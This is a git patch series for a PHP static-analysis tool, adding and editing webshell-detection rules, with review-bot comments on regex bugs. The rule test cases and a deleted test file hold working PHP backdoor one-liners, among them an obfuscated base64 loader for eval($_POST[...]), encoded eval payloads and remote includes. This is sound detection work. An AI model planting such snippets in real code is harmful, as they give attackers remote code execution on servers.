@@ -0,0 +1,19 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell2"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[\s*((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort)\s*\(+\s*.{1,100}),\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(].{1,25})\s*\)]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[array_filter($arr, base64_decode("ZXZhbA=="));]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> diff --git a/rules/CVI-360003.xml b/rules/CVI-360003.xml new file mode 100644 index 00000000..f3cc59f4 --- /dev/null +++ b/rules/CVI-360003.xml @@ -0,0 +1,19 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell3"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[\s*\$\s*(\w+)\s*=[\s\(\{]*['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^,;]*?\x|[^,;]*?['\"]\s*\.\s*['\"])[\s\S]{0,1000}(array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort)\s*\(+\s*.{1,100},\s*(\$\s*\1\s*\))]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[$e = "eval";array_filter($arr, $e);]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360004.xml b/rules/CVI-360004.xml index 046a05cd..57f5a512 100644 --- a/rules/CVI-360004.xml +++ b/rules/CVI-360004.xml 
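Review bot: The alternative `[^,;]*?\x|` in CVI-360003's pattern contains `\x` with no hex digits, which Python's `re` rejects at compile time as `incomplete escape \x`; if the engine is `re` (this project is Python) the rule never loads instead of matching `"\x65val"`-style obfuscation. The sibling `ass\\x65rt` in the same pattern shows the intended spelling — the backslash must be doubled to match a literal `\x` in source, i.e. `[^,;]*?\\x|`. The single `<test>` case (`$e = "eval";…`) does not exercise this branch; a case such as `$e = "\x65val";array_filter($arr, $e);` would have caught it.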
@@ -5,10 +5,7 @@ <match mode="regex-only-match"><![CDATA[(preg_replace|preg_filter)[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\s\(](101|0x65|0145|\d+)[^,]{0,25}\s*|['\"]\s*(([^\s])[^,]{0,20}\7['\"]*|[\(\}\[].{0,20}[\(\}\]])\w*e\w*['\"])\s*,\s*([^\),]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|((\$_(GET|POST|REQUEST|COOKIE).{0,25})))]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[ - $string = 'AABBCCDDEE'; - preg_replace($_POST['A'], $_POST['B'], $string); - ]]></case> + <case assert="true"><![CDATA[echo @preg_replace('/xx/e', $_POST[sss],axxa);]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360005.xml b/rules/CVI-360005.xml index 45ef2e8e..4b1f8e7e 100644 --- a/rules/CVI-360005.xml +++ b/rules/CVI-360005.xml @@ -5,6 +5,7 @@ <match mode="regex-only-match"><![CDATA[\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^;]*chr[\s\(]*(101|0x65|0145|\d+)|['\"](/[^/]*/|\|[^\|]*\||\'[^']*')\w{0,5}e\w{0,5}['\"])[\s\S]{0,1000}(preg_replace|preg_filter)[/*\s]*\([/*\s]*\$\s*\1.{0,30}(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)]]></match> <level value="7"/> <test> + <case assert="true"><![CDATA[($e = $_POST['e']) && @preg_replace($e, "eval", 'hello');]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360006.xml b/rules/CVI-360006.xml new file mode 100644 index 00000000..6ee6b053 --- /dev/null +++ b/rules/CVI-360006.xml 
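Review bot: The test case removed from CVI-360004, `preg_replace($_POST['A'], $_POST['B'], $string);` (tainted pattern and tainted replacement), is the canonical form of this backdoor and the pattern's `(\$_(GET|POST|REQUEST|COOKIE).{0,25})` alternatives are plainly meant to cover it, yet the only remaining assertion is the `/xx/e` literal-modifier form. Dropping the case rather than keeping it alongside the new one leaves that branch unasserted; if it failed only because of the leading newline and indent inside the CDATA, keep it as a single-line case: `<case assert="true"><![CDATA[preg_replace($_POST['A'], $_POST['B'], $string);]]></case>`. The `<solution>` block continues outside the hunk.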
@@ -0,0 +1,19 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell6"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[.*\s*\$\s*(\w+)\s*=\s*(\$_(GET|POST|REQUEST|COOKIE).{0,25})[\s\S]{0,1000}(preg_replace|preg_filter)[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\s\(](101|0x65|0145|\d+)[^,]{0,25}\s*|['\"]\s*(([^\s])[^,]{0,20}\10|[\(\}\[].{0,20}[\(\}\]])\w*e\w*['\"])\s*,([^\)]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|\s*.*\$\1)]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[($code = $_POST['code']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($code)', 'add');]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> diff --git a/rules/CVI-360007.xml b/rules/CVI-360007.xml index 1608f370..62b8cea4 100644 --- a/rules/CVI-360007.xml +++ b/rules/CVI-360007.xml 
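Review bot: The CVI-360006 pattern opens with `.*\s*\$\s*(\w+)`, and since `regex-only-match` patterns are not anchored the leading `.*` adds no selectivity; it only makes a backtracking engine consume each line to its end and back off one character at a time for every start position, which combines badly with the `[\s\S]{0,1000}` gap that follows. Dropping it (`\$\s*(\w+)\s*=\s*(\$_(GET|…`) finds the same code and brings the rule in line with CVI-360005, which starts directly at `\$\s*(\w+)`. The back-reference `\10` is correct for this group count but fragile — adding one group anywhere before it silently re-targets it — so a short comment in the rule noting that `\10` is the delimiter-character group would help the next editor.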
@@ -1,19 +1,15 @@ <?xml version="1.0" encoding="UTF-8"?> <cobra document="https://github.com/wufeifei/cobra"> - <name value="PHP反射后门"/> + <name value="webshell7"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[(new\s*ReflectionFunction|new\s*ArrayObject[\s\S]*->u[ak]sort)\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^'\"]*\\x).{0,200}|(\$_(GET|POST|REQUEST|COOKIE)\[[^,;\)]{0,250},[^;\),]{0,50}\$[^;\),]{0,50}\)))]]></match> + <match mode="regex-only-match"><![CDATA[(array_map|call_user_func|call_user_func_array|register_shutdown_function|register_tick_function)\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^'\"]*\x).{0,200})]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[ - $func = new ReflectionFunction($_GET[m]); - echo $func->invokeArgs(array($_GET[c],$_GET[id])); - ]]></case> + <case assert="true"><![CDATA[call_user_func('assert', $arr);]]></case> </test> <solution> ## 安全风险 代码中存在webshell - [webshell样例 链接](https://github.com/tennc/webshell/blob/master/php/p2j/PHP%20reflection.php.txt) ## 修复方案 删除 diff --git a/rules/CVI-360008.xml b/rules/CVI-360008.xml new file mode 100644 index 00000000..2524f03a --- /dev/null +++ b/rules/CVI-360008.xml 
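Review bot: Changing `[^'\"]*\\x` to `[^'\"]*\x` in the new CVI-360007 pattern turns a match for a literal `\x` hex escape into an incomplete regex escape — Python's `re` raises `incomplete escape \x` for it, so if the engine is `re` (the project is Python) this rule fails to compile rather than detecting `"\x65val"`-style callbacks; the old spelling `\\x` was correct. The rewrite also drops the `new ReflectionFunction` / `ArrayObject->uasort` detection entirely, and none of the rules visible in this patch picks it up, so the deleted test case (`$func = new ReflectionFunction($_GET[m]); … invokeArgs(...)`) is now undetected; I would keep those alternatives here or move them to their own CVI-3600xx rule with that case as its test. The hunk also removes the only reference link from the solution text.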
@@ -0,0 +1,22 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell8"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[\$\s*(\w+)\s*=[\s\(\{]*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec))[\s\S]{0,200}\b(array_map|call_user_func|call_user_func_array|register_shutdown_function|register_tick_function)\b\s*\(+\s*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1))[^,;]*,[^;\)]{0,50}\$[^;\)]{0,50}\)]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[ + $a = 'assert'; + call_user_func($a, $arr); + ]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> diff --git a/rules/CVI-360009.xml b/rules/CVI-360009.xml new file mode 100644 index 00000000..aa311c3e --- /dev/null +++ b/rules/CVI-360009.xml @@ -0,0 +1,22 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell9"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[((new\s*SQLite3[\s\S]*->\s*createFunction)\s*\(+\s*.{1,100}|PDO::FETCH_FUNC\s*),\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]+.{1,25}|(\$_(GET|POST|REQUEST|COOKIE).{0,25}))\s*\)]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[ + $db = new SQLite3('sqlite.db3'); + $db->createFunction('myfunc', $_POST['e']); + ]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> diff --git a/rules/CVI-360010.xml b/rules/CVI-360010.xml index 2a5e05cb..274fff85 100644 --- a/rules/CVI-360010.xml +++ b/rules/CVI-360010.xml 
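Review bot: In CVI-360009, `new\s*SQLite3[\s\S]*->\s*createFunction` leaves the gap between the constructor and the call unbounded, whereas every sibling rule in this series caps the same kind of gap at `[\s\S]{0,1000}`; on a large file this pairs an unrelated `new SQLite3(...)` with a `createFunction` hundreds of lines later, and the greedy `[\s\S]*` runs to end-of-file and backtracks for each candidate, making it the most expensive scan in the set. I would bound it to `[\s\S]{0,1000}` to match CVI-360010. Note also that `createFunction('myfunc', $_POST['e'])` is a user-controlled callback — an injection sink rather than a planted webshell — so the fix text `删除` (delete) is the wrong advice here; "never pass user input as the callback" fits better.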
@@ -2,12 +2,17 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell10"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^,;]*?\x|[^,;]*?['\"]\s*\.\s*['\"]))[\s\S]{0,1000}((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort|new\s*SQLite3[\s\S]*->\s*createFunction)\s*\(+[^,]*\$[^,]*|PDO::FETCH_FUNC\s*),\s*(\$\s*\1\s*\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1)) - ]]></match> + <match mode="regex-only-match"><![CDATA[\$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^,;]*?\x|[^,;]*?['\"]\s*\.\s*['\"]))[\s\S]{0,1000}((new\s*SQLite3[\s\S]*->\s*createFunction)\s*\(+[^,]*(\$)?[^,]*|PDO::FETCH_FUNC\s*),\s*(\$\s*\1\s*\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1))]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[$e = $_REQUEST['e'];$arr = array($_POST['pass'],);array_filter($arr, base64_decode($e));]]></case> + <case assert="true"><![CDATA[ + $e = $_REQUEST['e']; + $db = new SQLite3('sqlite.db3'); + $db->createFunction('myfunc', $e); + $stmt = $db->prepare("SELECT myfunc(?)"); + $stmt->bindValue(1, $_REQUEST['pass'], SQLITE3_TEXT); + $stmt->execute(); + ]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360037.xml b/rules/CVI-360037.xml new file mode 100644 index 00000000..db28b4e8 --- /dev/null +++ b/rules/CVI-360037.xml 
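Review bot: The rewritten CVI-360010 pattern still carries `[^,;]*?\x|` with no hex digits after `\x`, which Python's `re` rejects as `incomplete escape \x`; if the engine is `re` (this project is Python) the rule fails to load, and the new multi-line SQLite3 test case cannot pass in that state. The intended literal-backslash form is `[^,;]*?\\x|`, as the `ass\\x65rt` alternative in the same pattern spells it. Since this hunk only changed the tail of the pattern, a case such as `$e = "\x65val"; $db->createFunction('f', $e);` would have surfaced the compile error. The `<solution>` block continues outside the hunk.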
@@ -0,0 +1,22 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell2"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[\s*\$\s*(\w+)\s*=[\s\(]*['\"](([^\n'\"]{1,1000}(\.(jpg|png|txt|jpeg|log|tmp|db|cache)|\_(tmp|log)))|((http|https|file|php|data|ftp)\://.{0,100}))[\s\S]{0,1000}(include|require)(_once)?[\s\(]\$\1]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[ + $a="http://www.test.com/sss.php"; + require_once $a; + ]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> diff --git a/tests/vulnerabilities/webshell.php b/tests/vulnerabilities/webshell.php deleted file mode 100644 index ec485001..00000000 --- a/tests/vulnerabilities/webshell.php +++ /dev/null 
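Review bot: The new rule declares `<name value="webshell2"/>`, the same name CVI-360002 uses in this series, so reports and any name-keyed lookup cannot tell the two rules apart; the file is CVI-360037 and every other rule here names itself after its number, so this should be `<name value="webshell37"/>`. The rule itself is a useful companion to CVI-360001 (variable-carried include), and its `(http|https|…)\://.{0,100}` bound is the one CVI-360001 should share. A second test case for the extension branch (`$a = "x.jpg"; include $a;`) would cover the first alternative, which the single URL case does not.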
@@ -1,150 +0,0 @@ - - -//cvi-360002 -include "sss.jpg"; -include("sss_tmp"); -require_once "http://www.test.com/sss.php"; - -//扫不出来.... -$a="http://www.test.com/sss.php"; -require_once $a; - -///////////// - -//cvi-360004 -$string = 'AABBCCDDEE'; -preg_replace($_POST['A'], $_POST['B'], $string); - -$user =$_GET['user'];preg_replace(chr(101),exec('whoami'),"aaaa"); - -$b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add'; - -//cvi-360006 换行就挂 -$b = $_POST['B']; preg_replace($_POST['A'], $b, $string); - -///////////// - -//cvi-360007 -$func = new ReflectionFunction($_GET[m]); -echo $func->invokeArgs(array($_GET[c],$_GET[id])); - - - -//cvi-360008 - -//cvi-360009 -$e = $_REQUEST['e'];$arr = array($_POST['pass'],);array_filter($arr, base64_decode($e)); - -$ee = "eval()";array_filter($a, base64_decode($ee)); - -//cvi-360011 换行就挂 -$newfunc = create_function(null,'assert($cmd);');$newfunc(); - -//cvi-360012 换行就挂 -$newfunc = create_function('str','return str'); -$newfunc("$_POST['c']"); - -//cvi-360013 换行就挂的那种 -$fun = $_POST['fun'];$ newfunc = create_function('str',$fun); - -//cvi-360014 换行就挂的那种 -$a="eval(";$a($_GET['a']); - - -//cvi-360015 -if ($dbhandle = sqlite_open('mysqlitedb', 0666, $sqliteerror)) { - sqlite_create_function($dbhandle, 'func', 'eval($cmd);', 1); -} else { - echo 'Error opening sqlite db: ' . 
$sqliteerror; - exit; -} - - -//cvi-360016 -filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert'))); -//cvi-360017 换行挂 -$op=array('options' => 'assert'); -filter_var($_REQUEST['pass'], FILTER_CALLBACK, $op); - -//cvi-360018 一句话 -mb_ereg_replace('.*', $_REQUEST['op'], '', 'e'); -//cvi-360019 换行挂 -$e = "\ise"; -$data = mb_ereg_replace("/[^A-Za-z0-9\.\-]/","",$data,$e); - - -//cvi-360020 -array_walk($array,$_POST['func']); - -//cvi-360021 换行挂 - - -//cvi-360016 -filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert'))); -//cvi-360017 -$op=array('options' => 'assert'); -filter_var($_REQUEST['pass'], FILTER_CALLBACK, $op); - -//cvi-360018 -mb_ereg_replace('.*', $_REQUEST['op'], '', 'e'); -//cvi-360019 -$e = "\ise"; -$data = mb_ereg_replace("/[^A-Za-z0-9\.\-]/","",$data,$e); - -//cvi-360022 -ini_set('allow_url_include, 1'); // Allow url inclusion in this script -include('php://input'); - -//cvi-360023 特征值 -GIF87a<?php -BM<?php - -//cvi-360024 这什么玩意 -$f=$c('',$d);$f(); - -//cvi-360025 mdzz匹配不上 -$k = str_replace("8","","a8s88s8e8r88t");$k($_POST["8"]); - - -$mt="mFsKCleRfU"; -$ojj="IEBleldle"; -$hsa="E9TVFsnd2VuJ10p"; -$fnx="Ow=="; -$zk = str_replace("d","","sdtdrd_redpdldadcde"); -$ef = $zk("z", "", "zbazsze64_zdzeczodze"); -$dva = $zk("p","","pcprpepaptpe_fpupnpcptpipopn"); -$zvm = $dva('', $ef($zk("le", "", $ojj.$mt.$hsa.$fnx))); -//分解步骤 -//$zvm=create_function(base64_decode(str_replace("le","","IEBleldlemFsKCleRfUE9TVFsnd2VuJ10pOw=="))) //拼接后的语句 -//$zvm=create_function(base64_decode(IEBldmFsKCRfUE9TVFsnd2VuJ10pOw==))) //执行完str_replace函数后,返回base64加密后的字符串 -//$zvm=create_function(@eval($_POST['wen'])); //执行完base64_decode 得到解密后的字符串 得到一句话木马 密码是wen -$zvm(); //执行 - - -//cvi-360023 -GIF87a<?php -BM<?php - -//cvi-360026 -$cb= 'system'; -ob_start($cb); -echo $_GET[c]; -ob_end_flush(); - -$evalstr=""; -ob_start(function ($c,$d){global 
$evalstr;$evalstr=$c;}); -echo $_REQUEST['pass']; -ob_end_flush(); -assert($evalstr); - -ob_start(function ($c,$d){register_shutdown_function('assert',$c);}); -echo $_REQUEST['pass']; -ob_end_flush(); - -//cvi-360028 -eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtFeDVPRGhRTTBKdlkwRndiR1J0Um5OTFExSm1WVVU1VkZaR2RHdGlNamw1V0ZOclMweDVPQzVqYUhJb05EY3BMbEJuS1NrNykpOw)); -eval(gzinflate(base64_decode('s7ezsS/IKFBwSC1LzNFQiQ/wDw6JVlcpL9a1CyrNU4/VtE7OyM1PUQBKBbsGhbkGRSsFOwd5BoTEu3n6uPo5+roqxeoYmJiYaFrbA40CAA=='))); - -//cvi-360034 -$_POST['sa']($_POST['sb']); -?> From 6c2b6e7ac7a5fbf5822fefee5d04b9c02fe16733 Mon Sep 17 00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Thu, 7 Sep 2017 15:34:40 +0800 Subject: [PATCH 19/29] improve rules --- rules/CVI-180001.xml | 2 +- rules/CVI-180002.xml | 22 ---------------------- rules/CVI-220001.xml | 33 --------------------------------- rules/CVI-260001.xml | 2 -- rules/CVI-350002.xml | 24 ------------------------ rules/CVI-360011.xml | 20 ++++++++++++++++++++ rules/CVI-360013.xml | 4 +--- rules/CVI-360022.xml | 2 +- rules/CVI-360028.xml | 3 +++ rules/CVI-360031.xml | 14 ++++++++++++++ rules/CVI-360032.xml | 8 ++++++++ rules/CVI-360033.xml | 29 ++++++++++++++++++++++++++++- rules/CVI-360035.xml | 35 +++++++++++++++++++++++++++++++++++ rules/CVI-360036.xml | 23 +++++++++++++++++++++++ rules/vulnerabilities.xml | 1 + 15 files changed, 135 insertions(+), 87 deletions(-) delete mode 100644 rules/CVI-180002.xml delete mode 100644 rules/CVI-220001.xml delete mode 100644 rules/CVI-350002.xml create mode 100644 rules/CVI-360011.xml create mode 100644 rules/CVI-360035.xml create mode 100644 rules/CVI-360036.xml diff --git a/rules/CVI-180001.xml b/rules/CVI-180001.xml index 4b0969cb..5fdcee4c 100644 --- a/rules/CVI-180001.xml +++ b/rules/CVI-180001.xml 
@@ -2,7 +2,7 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="远程代码执行"/> <language value="php"/> - <match mode="function-param-controllable"><![CDATA[(array_map|create_function|call_user_func|call_user_func_array|assert|eval|dl|register_tick_function|register_shutdown_function|preg_replace)]]></match> + <match mode="function-param-controllable"><![CDATA[(array_map|create_function|call_user_func|call_user_func_array|assert|eval|dl|register_tick_function|register_shutdown_function|array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort)]]></match> <level value="10"/> <test> <case assert="true"><![CDATA[array_map($_GET['pass'],$array);]]></case> diff --git a/rules/CVI-180002.xml b/rules/CVI-180002.xml deleted file mode 100644 index 28036b9c..00000000 --- a/rules/CVI-180002.xml +++ /dev/null @@ -1,22 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="$func$"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[\b^.*`.*`.*$]]></match> - <level value="6"/> - <test> - <case assert="true"><![CDATA[ - $output = `ls -al`; - echo "<pre>$output</pre>"; - ]]></case> - - </test> - <solution> - ## 安全风险 - 远程代码执行 - - ## 修复方案 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-220001.xml b/rules/CVI-220001.xml deleted file mode 100644 index a135d6a2..00000000 --- a/rules/CVI-220001.xml +++ /dev/null 
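Review bot: Adding `array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort` to a level-10 `function-param-controllable` rule flags these functions whenever any argument is user-controlled, if that mode checks every parameter (I cannot confirm its semantics from here); for this group only the callback is dangerous, so `usort($_POST['list'], 'cmp')` or `array_filter($_GET['ids'])` would become a level-10 RCE finding with no sink. If the mode can pin a parameter position, the callback argument should be pinned; otherwise these functions belong with the regex rules (CVI-360002/360003 already cover them) rather than the taint rule. Dropping `preg_replace` from the list also removes taint-tracked detection of `preg_replace($tainted, …)`, which is still code execution on PHP 5 via `/e`; the regex rules only catch it when the `$_GET`/`$_POST` read falls inside their character windows.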
@@ -1,33 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="HRS(CRLF)"/> - <language value="php"/> - <match mode="function-param-controllable"><![CDATA[header]]></match> - <repair block="in-function-up"><![CDATA[in_array\s*\(\s*{{PARAM}}\s*,]]></repair> - <level value="5"/> - <test> - <case assert="true"><![CDATA[header("Location: ".$_GET["url"]);]]></case> - </test> - <solution> - ## 安全风险 - CRLF是"回车+换行"(\r\n)的简称。在HTTP协议中,HTTP Header与HTTP Body是用两个CRLF分隔的,浏览器根据这两个CRLF来取出HTTP内容并显示出来。 - 所以,一旦能够控制HTTP消息头中的字符,注入一些恶意的换行,就能注入一些会话Cookie或者HTML代码,所以CRLF Injection又叫HTTP Response Splitting. - CRLF Injection (CRLF注入) / HTTP Response Splitting(HRS) - - ## 修复方案 - 使用白名单判断 - - ## 代码示例 - - `<?php header("Location: ".$_GET["url"]); ?>` 构造 - `/index.php?url=a%0a%0dContent-Type:%20text/html%0a%0d%0a%0d<script>alert(1)</script>`发生注入 - - 修复方法:设置白名单,限制输入的URL - ```php - <?php if(!in_array($_GET["url"], $whitelist)) exit; ?> - ``` - </solution> - - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-260001.xml b/rules/CVI-260001.xml index 3f6f06de..9ca64e81 100644 --- a/rules/CVI-260001.xml +++ b/rules/CVI-260001.xml @@ -6,10 +6,8 @@ <level value="5"/> <test> <case assert="true"><![CDATA[ - <?php $test = $_POST['test']; $test_uns = unserialize($test); - ?> ]]></case> </test> <solution> diff --git a/rules/CVI-350002.xml b/rules/CVI-350002.xml deleted file mode 100644 index 0b22d73c..00000000 --- a/rules/CVI-350002.xml +++ /dev/null 
@@ -1,24 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="Redis匿名访问"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[\-\>connect\((['\"]\w+\.[\w\.]+?['\"]\s*,)\s*(\d+)[\),]]]></match> - <level value="4"/> - <test> - <case assert="true"><![CDATA[ - $redis = new Redis(); - $redis->connect('192.168.1.2', 6379); - $redis->auth('passwd123!#'); - $redis->set('key','SS'); - ]]></case> - </test> - <solution> - ## 安全风险 - Redis匿名访问 - - ## 修复方案 - 禁止使用匿名方式访问 - </solution> - <status value="on"/> - <author name="H4rdy" email="with.h4rdy@gmail.com"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360011.xml b/rules/CVI-360011.xml new file mode 100644 index 00000000..d3aff203 --- /dev/null +++ b/rules/CVI-360011.xml @@ -0,0 +1,20 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell11"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[\$(\w*)\s*=\s*create_function\s*\(+\s*[^;\n\r\)]{1,100},\s*(['\"]\s*[^;\n\r\)]{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^,\n\r\)]{0,100}file_get_contents.{1,})\s*\)[\s\S]+\$\1\s*\([^\)]*\)]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[$sa = create_function('xxx', "eval($_POST['sb']");$sa();]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> + diff --git a/rules/CVI-360013.xml b/rules/CVI-360013.xml index a8c0f7e6..5f186e6e 100644 --- a/rules/CVI-360013.xml +++ b/rules/CVI-360013.xml 
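Review bot: The new CVI-360011 regex lists `poc_open` in its dangerous-function alternation, which is a typo for `proc_open` (CVI-360013 on the same page spells it `proc_open`), so a `create_function` body built around `proc_open(` is never matched. Change the alternation to `(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)`. The single test case `"eval($_POST['sb']"` is also missing its closing parenthesis; it still satisfies the regex, but a syntactically valid sample such as `"eval($_POST['sb']);"` would make the fixture usable for an AST-based check later.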
@@ -2,9 +2,7 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell13"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*.{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec).{1,100}\s*['\"]|file_get_contents)[\s\S]{0,200}create_function\s*\(+[^,]{1,100},['\"\s]*(\$\s*\1['\"\s]*\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1)) - ]]></match> + <match mode="regex-only-match"><![CDATA[\$\s*(\w+)\s*=[\s\(\{]*(['\"]\s*.{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec).{1,100}\s*['\"]|file_get_contents)[\s\S]{0,200}create_function\s*\(+[^,]{1,100},['\"\s]*(\$\s*\1['\"\s]*\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1))]]></match> <level value="7"/> <test> <case assert="true"><![CDATA[]]></case> diff --git a/rules/CVI-360022.xml b/rules/CVI-360022.xml index 7e110ed8..c5bf35b3 100644 --- a/rules/CVI-360022.xml +++ b/rules/CVI-360022.xml @@ -2,7 +2,7 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell22"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|include)(\b\s)*\(\s*(file_get_contents\s*\(\s*)?['\"]php://input]]></match> + <match 